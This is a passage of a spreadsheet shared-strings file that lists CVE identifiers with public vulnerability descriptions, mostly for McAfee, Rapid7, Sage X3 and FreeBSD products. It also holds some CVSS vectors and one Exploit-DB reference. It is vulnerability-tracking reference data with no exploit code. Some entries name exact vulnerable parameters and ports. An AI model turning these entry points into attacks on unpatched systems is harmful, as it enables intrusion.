    <t>CVE-2020-7305</t>
  </si>
  <si>
    <t>Privilege escalation vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows a low privileged remote attacker to create new rule sets via incorrect validation of user credentials.</t>
  </si>
  <si>
    <t>CVE-2020-7306</t>
  </si>
  <si>
    <t>Unprotected Storage of Credentials vulnerability in McAfee Data Loss Prevention (DLP) for Mac prior to 11.5.2 allows local users to gain access to the ADRMS username and password via unprotected log files containing plain text</t>
  </si>
  <si>
    <t>CVE-2020-7307</t>
  </si>
  <si>
    <t>Unprotected Storage of Credentials vulnerability in McAfee Data Loss Prevention (DLP) for Mac prior to 11.5.2 allows local users to gain access to the RiskDB username and password via unprotected log files containing plain text credentials.</t>
  </si>
  <si>
    <t>CVE-2020-7308</t>
  </si>
  <si>
    <t>Cleartext Transmission of Sensitive Information between McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 February 2021 Update and McAfee Global Threat Intelligence (GTI) servers using DNS allows a remote attacker to view the requests from ENS and responses from GTI over DNS. By gaining control of an intermediate DNS server or altering the network DNS configuration, it is possible for an attacker to intercept requests and send their own responses.</t>
  </si>
  <si>
    <t>CVE-2020-7309</t>
  </si>
  <si>
    <t>Cross Site Scripting vulnerability in ePO extension in McAfee Application Control (MAC) prior to 8.3.1 allows administrators to inject arbitrary web script or HTML via specially crafted input in the policy discovery section.</t>
  </si>
  <si>
    <t>CVE-2020-7310</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in the installer in McAfee McAfee Total Protection (MTP) trial prior to 4.0.161.1 allows local users to change files that are part of write protection rules via manipulating symbolic links to redirect a McAfee file operations to an unintended file.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-7311</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in the installer in McAfee Agent (MA) for Windows prior to 5.6.6 allows local users to assume SYSTEM rights during the installation of MA via manipulation of log files.</t>
  </si>
  <si>
    <t>CVE-2020-7312</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking Vulnerability in the installer in McAfee Agent (MA) for Windows prior to 5.6.6 allows local users to execute arbitrary code and escalate privileges via execution from a compromised folder.</t>
  </si>
  <si>
    <t>CVE-2020-7314</t>
  </si>
  <si>
    <t>Privilege Escalation Vulnerability in the installer in McAfee Data Exchange Layer (DXL) Client for Mac shipped with McAfee Agent (MA) for Mac prior to MA 5.6.6 allows local users to run commands as root via incorrectly applied permissions on temporary files.</t>
  </si>
  <si>
    <t>CVE-2020-7315</t>
  </si>
  <si>
    <t>DLL Injection Vulnerability in McAfee Agent (MA) for Windows prior to 5.6.6 allows local users to execute arbitrary code via careful placement of a malicious DLL.</t>
  </si>
  <si>
    <t>CVE-2020-7316</t>
  </si>
  <si>
    <t>Unquoted service path vulnerability in McAfee File and Removable Media Protection (FRP) prior to 5.3.0 allows local users to execute arbitrary code, with higher privileges, via execution and from a compromised folder. This issue may result in files not being encrypted when a policy is triggered.</t>
  </si>
  <si>
    <t>CVE-2020-7317</t>
  </si>
  <si>
    <t>Cross-Site Scripting vulnerability in McAfee ePolicy Orchistrator (ePO) prior to 5.10.9 Update 9 allows administrators to inject arbitrary web script or HTML via parameter values for "syncPointList" not being correctly sanitsed.</t>
  </si>
  <si>
    <t>CVE-2020-7318</t>
  </si>
  <si>
    <t>Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO) prior to 5.10.9 Update 9 allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.</t>
  </si>
  <si>
    <t>CVE-2020-7319</t>
  </si>
  <si>
    <t>Improper Access Control vulnerability in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 September 2020 Update allows local users to access files which the user otherwise would not have access to via manipulating symbolic links to redirect McAfee file operations to an unintended file.</t>
  </si>
  <si>
    <t>CVE-2020-7320</t>
  </si>
  <si>
    <t>Protection Mechanism Failure vulnerability in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 September 2020 Update allows local administrator to temporarily reduce the detection capability allowing otherwise detected malware to run via stopping certain Microsoft services.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-7322</t>
  </si>
  <si>
    <t>Information Disclosure Vulnerability in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 September 2020 Update allows local users to gain access to sensitive information via incorrectly logging of sensitive information in debug logs.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-7323</t>
  </si>
  <si>
    <t>Authentication Protection Bypass vulnerability in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 September 2020 Update allows physical local users to bypass the Windows lock screen via triggering certain detection events while the computer screen is locked and the McTray.exe is running with elevated privileges. This issue is timing dependent and requires physical access to the machine.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-7324</t>
  </si>
  <si>
    <t>Improper Access Control vulnerability in McAfee MVISION Endpoint prior to 20.9 Update allows local users to bypass security mechanisms and deny access to the SYSTEM folder via incorrectly applied permissions.</t>
  </si>
  <si>
    <t>CVE-2020-7325</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee MVISION Endpoint prior to 20.9 Update allows local users to access files which the user otherwise would not have access to via manipulating symbolic links to redirect McAfee file operations to an unintended file.</t>
  </si>
  <si>
    <t>CVE-2020-7326</t>
  </si>
  <si>
    <t>Improperly implemented security check in McAfee Active Response (MAR) prior to 2.4.4 may allow local administrators to execute malicious code via stopping a core Windows service leaving McAfee core trust component in an inconsistent state resulting in MAR failing open rather than closed</t>
  </si>
  <si>
    <t>CVE-2020-7327</t>
  </si>
  <si>
    <t>Improperly implemented security check in McAfee MVISION Endpoint Detection and Response Client (MVEDR) prior to 3.2.0 may allow local administrators to execute malicious code via stopping a core Windows service leaving McAfee core trust component in an inconsistent state resulting in MVEDR failing open rather than closed</t>
  </si>
  <si>
    <t>CVE-2020-7328</t>
  </si>
  <si>
    <t>External entity attack vulnerability in the ePO extension in McAfee MVISION Endpoint prior to 20.11 allows remote attackers to gain control of a resource or trigger arbitrary code execution via improper input validation of an HTTP request, where the content for the attack has been loaded into ePO by an ePO administrator.</t>
  </si>
  <si>
    <t>CVE-2020-7329</t>
  </si>
  <si>
    <t>Server-side request forgery vulnerability in the ePO extension in McAfee MVISION Endpoint prior to 20.11 allows remote attackers trigger server-side DNS requests to arbitrary domains via carefully constructed XML files loaded by an ePO administrator.</t>
  </si>
  <si>
    <t>CVE-2020-7330</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Total Protection (MTP) trial prior to 4.0.176.1 allows local users to schedule tasks which call malicious software to execute with elevated privileges via editing of environment variables</t>
  </si>
  <si>
    <t>CVE-2020-7331</t>
  </si>
  <si>
    <t>Unquoted service executable path in McAfee Endpoint Security (ENS) prior to 10.7.0 November 2020 Update allows local users to cause a denial of service and malicious file execution via carefully crafted and named executable files.</t>
  </si>
  <si>
    <t>CVE-2020-7332</t>
  </si>
  <si>
    <t>Cross Site Request Forgery vulnerability in the firewall ePO extension of McAfee Endpoint Security (ENS) prior to 10.7.0 November 2020 Update allows an attacker to execute arbitrary HTML code due to incorrect security configuration.</t>
  </si>
  <si>
    <t>CVE-2020-7333</t>
  </si>
  <si>
    <t>Cross site scripting vulnerability in the firewall ePO extension of McAfee Endpoint Security (ENS) prior to 10.7.0 November 2020 Update allows administrators to inject arbitrary web script or HTML via the configuration wizard.</t>
  </si>
  <si>
    <t>CVE-2020-7334</t>
  </si>
  <si>
    <t>Improper privilege assignment vulnerability in the installer McAfee Application and Change Control (MACC) prior to 8.3.2 allows local administrators to change or update the configuration settings via a carefully constructed MSI configured to mimic the genuine installer. This version adds further controls for installation/uninstallation of software.</t>
  </si>
  <si>
    <t>CVE-2020-7335</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in Microsoft Windows client McAfee Total Protection (MTP) prior to 16.0.29 allows local users to gain elevated privileges via careful manipulation of a folder by creating a junction link. This exploits a lack of protection through a timing issue and is only exploitable in a small time window.</t>
  </si>
  <si>
    <t>CVE-2020-7336</t>
  </si>
  <si>
    <t>Cross Site Request Forgery vulnerability in McAfee Network Security Management (NSM) prior to 10.1.7.35 and NSM 9.x prior to 9.2.9.55 may allow an attacker to change the configuration of the Network Security Manager via a carefully crafted HTTP request.</t>
  </si>
  <si>
    <t>CVE-2020-7337</t>
  </si>
  <si>
    <t>Incorrect Permission Assignment for Critical Resource vulnerability in McAfee VirusScan Enterprise (VSE) prior to 8.8 Patch 16 allows local administrators to bypass local security protection through VSE not correctly integrating with Windows Defender Application Control via careful manipulation of the Code Integrity checks.</t>
  </si>
  <si>
    <t>CVE-2020-7339</t>
  </si>
  <si>
    <t>Use of a Broken or Risky Cryptographic Algorithm vulnerability in McAfee Database Security Server and Sensor prior to 4.8.0 in the form of a SHA1 signed certificate that would allow an attacker on the same local network to potentially intercept communication between the Server and Sensors.</t>
  </si>
  <si>
    <t>CVE-2020-7343</t>
  </si>
  <si>
    <t>Missing Authorization vulnerability in McAfee Agent (MA) for Windows prior to 5.7.1 allows local users to block McAfee product updates by manipulating a directory used by MA for temporary files. The product would continue to function with out-of-date detection files.</t>
  </si>
  <si>
    <t>CVE-2020-7346</t>
  </si>
  <si>
    <t>Privilege Escalation vulnerability in McAfee Data Loss Prevention (DLP) for Windows prior to 11.6.100 allows a local, low privileged, attacker through the use of junctions to cause the product to load DLLs of the attacker's choosing. This requires the creation and removal of junctions by the attacker along with sending a specific IOTL command at the correct time.</t>
  </si>
  <si>
    <t>CVE-2020-7350</t>
  </si>
  <si>
    <t>Rapid7 Metasploit Framework versions before 5.0.85 suffers from an instance of CWE-78: OS Command Injection, wherein the libnotify plugin accepts untrusted user-supplied data via a remote computer's hostname or service name. An attacker can create a specially-crafted hostname or service name to be imported by Metasploit from a variety of sources and trigger a command injection on the operator's terminal. Note, only the Metasploit Framework and products that expose the plugin system is susceptible to this issue -- notably, this does not include Rapid7 Metasploit Pro. Also note, this vulnerability cannot be triggered through a normal scan operation -- the attacker would have to supply a file that is processed with the db_import command.</t>
  </si>
  <si>
    <t>CVE-2020-7351</t>
  </si>
  <si>
    <t>An OS Command Injection vulnerability in the endpoint_devicemap.php component of Fonality Trixbox Community Edition allows an attacker to execute commands on the underlying operating system as the "asterisk" user. Note that Trixbox Community Edition has been unsupported by the vendor since 2012. This issue affects: Fonality Trixbox Community Edition, versions 1.2.0 through 2.8.0.4. Versions 1.0 and 1.1 are unaffected.</t>
  </si>
  <si>
    <t>CVE-2020-7352</t>
  </si>
  <si>
    <t>The GalaxyClientService component of GOG Galaxy runs with elevated SYSTEM privileges in a Windows environment. Due to the software shipping with embedded, static RSA private key, an attacker with this key material and local user permissions can effectively send any operating system command to the service for execution in this elevated context. The service listens for such commands on a locally-bound network port, localhost:9978. A Metasploit module has been published which exploits this vulnerability. This issue affects the 2.0.x branch of the software (2.0.12 and earlier) as well as the 1.2.x branch (1.2.64 and earlier). A fix was issued for the 2.0.x branch of the affected software.</t>
  </si>
  <si>
    <t>CVE-2020-7354</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS) vulnerability in the 'host' field of a discovered scan asset in Rapid7 Metasploit Pro allows an attacker with a specially-crafted network service of a scan target to store an XSS sequence in the Metasploit Pro console, which will trigger when the operator views the record of that scanned host in the Metasploit Pro interface. This issue affects Rapid7 Metasploit Pro version 4.17.1-20200427 and prior versions, and is fixed in Metasploit Pro version 4.17.1-20200514. See also CVE-2020-7355, which describes a similar issue, but involving the generated 'notes' field of a discovered scan asset.</t>
  </si>
  <si>
    <t>CVE-2020-7355</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS) vulnerability in the 'notes' field of a discovered scan asset in Rapid7 Metasploit Pro allows an attacker with a specially-crafted network service of a scan target store an XSS sequence in the Metasploit Pro console, which will trigger when the operator views the record of that scanned host in the Metasploit Pro interface. This issue affects Rapid7 Metasploit Pro version 4.17.1-20200427 and prior versions, and is fixed in Metasploit Pro version 4.17.1-20200514. See also CVE-2020-7354, which describes a similar issue, but involving the generated 'host' field of a discovered scan asset.</t>
  </si>
  <si>
    <t>CVE-2020-7356</t>
  </si>
  <si>
    <t>CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability. Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and execute SYSTEM commands.</t>
  </si>
  <si>
    <t>CVE-2020-7357</t>
  </si>
  <si>
    <t>Cayin CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'NTP_Server_IP' HTTP POST parameter in system.cgi page. This issue affects several branches and versions of the CMS application, including CME-SE, CMS-60, CMS-40, CMS-20, and CMS version 8.2, 8.0, and 7.5.</t>
  </si>
  <si>
    <t>CVE-2020-7358</t>
  </si>
  <si>
    <t>In AppSpider installer versions prior to 7.2.126, the AppSpider installer calls an executable which can be placed in the appropriate directory by an attacker with access to the local machine. This would prevent the installer from distinguishing between a valid executable called during an installation and any arbitrary code executable using the same file name.</t>
  </si>
  <si>
    <t>CVE-2020-7360</t>
  </si>
  <si>
    <t>An Uncontrolled Search Path Element (CWE-427) vulnerability in SmartControl version 4.3.15 and versions released before April 15, 2020 may allow an authenticated user to escalate privileges by placing a specially crafted DLL file in the search path. This issue was fixed in version 1.0.7, which was released after April 15, 2020. (Note, the version numbering system changed significantly between version 4.3.15 and version 1.0.7.)</t>
  </si>
  <si>
    <t>CVE-2020-7361</t>
  </si>
  <si>
    <t>The EasyCorp ZenTao Pro application suffers from an OS command injection vulnerability in its '/pro/repo-create.html' component. After authenticating to the ZenTao dashboard, attackers may construct and send arbitrary OS commands via the POST parameter 'path', and those commands will run in an elevated SYSTEM context on the underlying Windows operating system.</t>
  </si>
  <si>
    <t>CVE-2020-7363</t>
  </si>
  <si>
    <t>User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of UCWeb's UC Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects UCWeb's UC Browser version 13.0.8 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-7364</t>
  </si>
  <si>
    <t>CVE-2020-7369</t>
  </si>
  <si>
    <t>User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of the Yandex Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the Yandex Browser version 20.8.3 and prior versions, and was fixed in version 20.8.4 released October 1, 2020.</t>
  </si>
  <si>
    <t>CVE-2020-7370</t>
  </si>
  <si>
    <t>User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of Danyil Vasilenko's Bolt Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the Bolt Browser version 1.4 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-7371</t>
  </si>
  <si>
    <t>User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of the Yandex Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the RITS Browser version 3.3.9 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-7373</t>
  </si>
  <si>
    <t>vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. ALSO NOTE: CVE-2020-7373 is a duplicate of CVE-2020-17496. CVE-2020-17496 is the preferred CVE ID to track this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-7374</t>
  </si>
  <si>
    <t>Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.</t>
  </si>
  <si>
    <t>CVE-2020-7376</t>
  </si>
  <si>
    <t>The Metasploit Framework module "post/osx/gather/enum_osx module" is affected by a relative path traversal vulnerability in the get_keychains method which can be exploited to write arbitrary files to arbitrary locations on the host filesystem when the module is run on a malicious host.</t>
  </si>
  <si>
    <t>CVE-2020-7377</t>
  </si>
  <si>
    <t>The Metasploit Framework module "auxiliary/admin/http/telpho10_credential_dump" module is affected by a relative path traversal vulnerability in the untar method which can be exploited to write arbitrary files to arbitrary locations on the host file system when the module is run on a malicious HTTP server.</t>
  </si>
  <si>
    <t>CVE-2020-7378</t>
  </si>
  <si>
    <t>CRIXP OpenCRX version 4.30 and 5.0-20200717 and prior suffers from an unverified password change vulnerability. An attacker who is able to connect to the affected OpenCRX instance can change the password of any user, including admin-Standard, to any chosen value. This issue was resolved in version 5.0-20200904, released September 4, 2020.</t>
  </si>
  <si>
    <t>CVE-2020-7381</t>
  </si>
  <si>
    <t>In Rapid7 Nexpose installer versions prior to 6.6.40, the Nexpose installer calls an executable which can be placed in the appropriate directory by an attacker with access to the local machine. This would prevent the installer from distinguishing between a valid executable called during a Security Console installation and any arbitrary code executable using the same file name.</t>
  </si>
  <si>
    <t>CVE-2020-7382</t>
  </si>
  <si>
    <t>Rapid7 Nexpose installer version prior to 6.6.40 contains an Unquoted Search Path which may allow an attacker on the local machine to insert an arbitrary file into the executable path. This issue affects: Rapid7 Nexpose versions prior to 6.6.40.</t>
  </si>
  <si>
    <t>CVE-2020-7383</t>
  </si>
  <si>
    <t>A SQL Injection issue in Rapid7 Nexpose version prior to 6.6.49 that may have allowed an authenticated user with a low permission level to access resources &amp; make changes they should not have been able to access.</t>
  </si>
  <si>
    <t>CVE-2020-7384</t>
  </si>
  <si>
    <t>Rapid7's Metasploit msfvenom framework handles APK files in a way that allows for a malicious user to craft and publish a file that would execute arbitrary commands on a victim's machine.</t>
  </si>
  <si>
    <t>exploits/multiple/local/49491.py</t>
  </si>
  <si>
    <t>Metasploit Framework 6.0.11 - msfvenom APK template command injection</t>
  </si>
  <si>
    <t>CVE-2020-7385</t>
  </si>
  <si>
    <t>By launching the drb_remote_codeexec exploit, a Metasploit Framework user will inadvertently expose Metasploit to the same deserialization issue that is exploited by that module, due to the reliance on the vulnerable Distributed Ruby class functions. Since Metasploit Framework typically runs with elevated privileges, this can lead to a system compromise on the Metasploit workstation. Note that an attacker would have to lie in wait and entice the Metasploit user to run the affected module against a malicious endpoint in a "hack-back" type of attack. Metasploit is only vulnerable when the drb_remote_codeexec module is running. In most cases, this cannot happen automatically.</t>
  </si>
  <si>
    <t>CVE-2020-7387</t>
  </si>
  <si>
    <t>Sage X3 Installation Pathname Disclosure. A specially crafted packet can elicit a response from the AdxDSrv.exe component that reveals the installation directory of the product. Note that this vulnerability can be combined with CVE-2020-7388 to achieve full RCE. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR &amp; Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.</t>
  </si>
  <si>
    <t>CVE-2020-7388</t>
  </si>
  <si>
    <t>Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR &amp; Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.</t>
  </si>
  <si>
    <t>CVE-2020-7389</t>
  </si>
  <si>
    <t>Sage X3 System CHAINE Variable Script Command Injection. An authenticated user with developer access can pass OS commands via this variable used by the web application. Note, this developer configuration should not be deployed in production.</t>
  </si>
  <si>
    <t>CVE-2020-7390</t>
  </si>
  <si>
    <t>Sage X3 Stored XSS Vulnerability on â€˜Editâ€™ Page of User Profile. An authenticated user can pass XSS strings the "First Name," "Last Name," and "Email Address" fields of this web application component. Updates are available for on-premises versions of Version 12 (components shipped with Syracuse 12.10.0 and later) of Sage X3. Other on-premises versions of Sage X3 are unaffected or unsupported by the vendor.</t>
  </si>
  <si>
    <t>CVE-2020-7450</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r357213, 12.1-RELEASE before 12.1-RELEASE-p2, 12.0-RELEASE before 12.0-RELEASE-p13, 11.3-STABLE before r357214, and 11.3-RELEASE before 11.3-RELEASE-p6, URL handling in libfetch with URLs containing username and/or password components is vulnerable to a heap buffer overflow allowing program misbehavior or malicious code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7451</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r358739, 12.1-RELEASE before 12.1-RELEASE-p3, 11.3-STABLE before r358740, and 11.3-RELEASE before 11.3-RELEASE-p7, a TCP SYN-ACK or challenge TCP-ACK segment over IPv6 that is transmitted or retransmitted does not properly initialize the Traffic Class field disclosing one byte of kernel memory over the network.</t>
  </si>
  <si>
    <t>CVE-2020-7452</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r357490, 12.1-RELEASE before 12.1-RELEASE-p3, 11.3-STABLE before r357489, and 11.3-RELEASE before 11.3-RELEASE-p7, incorrect use of a user-controlled pointer in the epair virtual network module allowed vnet jailed privileged users to panic the host system and potentially execute arbitrary code in the kernel.</t>
  </si>
  <si>
    <t>CVE-2020-7453</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r359021, 12.1-RELEASE before 12.1-RELEASE-p3, 11.3-STABLE before r359020, and 11.3-RELEASE before 11.3-RELEASE-p7, a missing null termination check in the jail_set configuration option "osrelease" may return more bytes with a subsequent jail_get system call allowing a malicious jail superuser with permission to create nested jails to read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-7454</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r360971, 12.1-RELEASE before p5, 11.4-STABLE before r360971, 11.4-BETA1 before p1 and 11.3-RELEASE before p9, libalias does not properly validate packet length resulting in modules causing an out of bounds read/write condition if no checking was built into the module.</t>
  </si>
  <si>
    <t>CVE-2020-7455</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r360973, 12.1-RELEASE before p5, 11.4-STABLE before r360973, 11.4-BETA1 before p1 and 11.3-RELEASE before p9, the FTP packet handler in libalias incorrectly calculates some packet length allowing disclosure of small amounts of kernel (for kernel NAT) or natd process space (for userspace natd).</t>
  </si>
  <si>
    <t>CVE-2020-7456</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r361918, 12.1-RELEASE before p6, 11.4-STABLE before r361919, 11.3-RELEASE before p10, and 11.4-RC2 before p1, an invalid memory location may be used for HID items if the push/pop level is not restored within the processing of that HID item allowing an attacker with physical access to a USB port to be able to use a specially crafted USB device to gain kernel or user-space code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7457</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r359565, 12.1-RELEASE before p7, 11.4-STABLE before r362975, 11.4-RELEASE before p1, and 11.3-RELEASE before p11, missing synchronization in the IPV6_2292PKTOPTIONS socket option set handler contained a race condition allowing a malicious application to modify memory after being freed, possibly resulting in code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7458</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r362281, 11.4-STABLE before r362281, and 11.4-RELEASE before p1, long values in the user-controlled PATH environment variable cause posix_spawnp to write beyond the end of the heap allocated stack possibly leading to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7459</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r362166, 12.1-RELEASE before p8, 11.4-STABLE before r362167, 11.4-RELEASE before p2, and 11.3-RELEASE before p12, missing length validation code common to mulitple USB network drivers allows a malicious USB device to write beyond the end of an allocated network packet buffer.</t>
  </si>
  <si>
    <t>CVE-2020-7460</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r363918, 12.1-RELEASE before p8, 11.4-STABLE before r363919, 11.4-RELEASE before p2, and 11.3-RELEASE before p12, the sendmsg system call in the compat32 subsystem on 64-bit platforms has a time-of-check to time-of-use vulnerability allowing a mailcious userspace program to modify control message headers after they were validation.</t>
  </si>
  <si>
    <t>CVE-2020-7461</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r365010, 11.4-STABLE before r365011, 12.1-RELEASE before p9, 11.4-RELEASE before p3, and 11.3-RELEASE before p13, dhclient(8) fails to handle certain malformed input related to handling of DHCP option 119 resulting a heap overflow. The heap overflow could in principle be exploited to achieve remote code execution. The affected process runs with reduced privileges in a Capsicum sandbox, limiting the immediate impact of an exploit.</t>
  </si>
  <si>
    <t>CVE-2020-7462</t>
  </si>
  <si>
    <t>In 11.4-PRERELEASE before r360733 and 11.3-RELEASE before p13, improper mbuf handling in the kernel causes a use-after-free bug by sending IPv6 Hop-by-Hop options over the loopback interface. The use-after-free situation may result in unintended kernel behaviour including a kernel panic.</t>
  </si>
  <si>
    <t>CVE-2020-7463</t>
  </si>
  <si>
    <t>In FreeBSD 12.1-STABLE before r364644, 11.4-STABLE before r364651, 12.1-RELEASE before p9, 11.4-RELEASE before p3, and 11.3-RELEASE before p13, improper handling in the kernel causes a use-after-free bug by sending large user messages from multiple threads on the same SCTP socket. The use-after-free situation may result in unintended kernel behaviour including a kernel panic.</t>
  </si>
  <si>
    <t>CVE-2020-7464</t>
  </si>
  <si>
    <t>In FreeBSD 12.2-STABLE before r365730, 11.4-STABLE before r365738, 12.1-RELEASE before p10, 11.4-RELEASE before p4, and 11.3-RELEASE before p14, a programming error in the ure(4) device driver caused some Realtek USB Ethernet interfaces to incorrectly report packets with more than 2048 bytes in a single USB transfer as having a length of only 2048 bytes. An adversary can exploit this to cause the driver to misinterpret part of the payload of a large packet as a separate packet, and thereby inject packets across security boundaries such as VLANs.</t>
  </si>
  <si>
    <t>CVE-2020-7465</t>
  </si>
  <si>
    <t>The L2TP implementation of MPD before 5.9 allows a remote attacker who can send specifically crafted L2TP control packet with AVP Q.931 Cause Code to execute arbitrary code or cause a denial of service (memory corruption).</t>
  </si>
  <si>
    <t>CVE-2020-7466</t>
  </si>
  <si>
    <t>The PPP implementation of MPD before 5.9 allows a remote attacker who can send specifically crafted PPP authentication message to cause the daemon to read beyond allocated memory buffer, which would result in a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-7467</t>
  </si>
  <si>
    <t>In FreeBSD 12.2-STABLE before r365767, 11.4-STABLE before r365769, 12.1-RELEASE before p10, 11.4-RELEASE before p4 and 11.3-RELEASE before p14 a number of AMD virtualization instructions operate on host physical addresses, are not subject to nested page table translation, and guest use of these instructions was not trapped.</t>
  </si>
  <si>
    <t>CVE-2020-7468</t>
  </si>
  <si>
    <t>In FreeBSD 12.2-STABLE before r365772, 11.4-STABLE before r365773, 12.1-RELEASE before p10, 11.4-RELEASE before p4 and 11.3-RELEASE before p14 a ftpd(8) bug in the implementation of the file system sandbox, combined with capabilities available to an authenticated FTP user, can be used to escape the file system restriction configured in ftpchroot(5). Moreover, the bug allows a malicious client to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-7469</t>
  </si>
  <si>
    <t>In FreeBSD 12.2-STABLE before r367402, 11.4-STABLE before r368202, 12.2-RELEASE before p1, 12.1-RELEASE before p11 and 11.4-RELEASE before p5 the handler for a routing option caches a pointer into the packet buffer holding the ICMPv6 message. However, when processing subsequent options the packet buffer may be freed, rendering the cached pointer invalid. The network stack may later dereference the pointer, potentially triggering a use-after-free.</t>
  </si>
  <si>
    <t>CVE-2020-7470</t>
  </si>
  <si>
    <t>Sonoff TH 10 and 16 devices with firmware 6.6.0.21 allows XSS via the Friendly Name 1 field (after a successful login with the Web Admin Password).</t>
  </si>
  <si>
    <t>CVE-2020-7471</t>
  </si>
  <si>
    <t>Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3 allows SQL Injection if untrusted data is used as a StringAgg delimiter (e.g., in Django applications that offer downloads of data as a series of rows with a user-specified column delimiter). By passing a suitably crafted delimiter to a contrib.postgres.aggregates.StringAgg instance, it was possible to break escaping and inject malicious SQL.</t>
  </si>
  <si>
    <t>CVE-2020-7472</t>
  </si>
  <si>
    <t>An authorization bypass and PHP local-file-include vulnerability in the installation component of SugarCRM before 8.0, 8.0 before 8.0.7, 9.0 before 9.0.4, and 10.0 before 10.0.0 allows for unauthenticated remote code execution against a configured SugarCRM instance via crafted HTTP requests. (This is exploitable even after installation is completed.).</t>
  </si>
  <si>
    <t>CVE-2020-7473</t>
  </si>
  <si>
